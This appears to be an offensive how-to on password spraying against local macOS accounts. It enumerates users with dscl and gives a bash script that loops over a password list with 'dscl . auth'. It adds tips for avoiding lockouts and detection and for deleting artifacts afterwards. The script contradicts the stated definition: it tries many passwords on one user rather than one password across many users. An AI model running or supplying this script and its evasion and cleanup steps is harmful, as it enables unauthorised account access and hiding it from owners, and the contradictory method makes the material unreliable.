Password Spraying

A password spraying attack involves attempting a single password across multiple user accounts to avoid account lockouts. This attack can target local accounts on a macOS system.

Prerequisites

• A list of valid usernames.
• A single password or a small set of passwords for spraying.

Gather a User List (if needed)

dscl . list /Users

Save the list to a file for iteration:

dscl . list /Users > userlist.txt

Performing the Password Spraying Attack

The dscl command can be used to authenticate users:

dscl . auth <username> <password>

Successful output indicates valid credentials.

Automating the Spraying

Write a script to iterate through passwords with a single username:

#!/bin/bash

username="steve"
passwordlist="passwords.txt"

while IFS= read -r password; do
    echo -n "[+] Testing password: $password ......"
    dscl . auth "$username" "$password" &>/dev/null && echo "Success $username:$password" || echo "Failed"
done < "$passwordlist"

Save the script as spray.sh and make it executable:

chmod +x spray.sh

Run the script:

./spray.sh

Monitoring and Avoiding Detection

Bypass Detection

• Test one password at a time across multiple accounts to avoid lockouts.

• Introduce delays between attempts:

  sleep 5

Monitor for Detection

Check logs for unusual activity:

sudo tail -f /var/log/system.log | grep -i "authentication"

Post-Attack Cleanup

• Remove user lists or any generated artifacts:

rm userlist.txt spray.sh

Notes:

• Local accounts may have stronger password policies or different authentication mechanisms.
• macOS has built-in protections, such as account lockout and delayed authentication responses, which may hinder spraying attempts.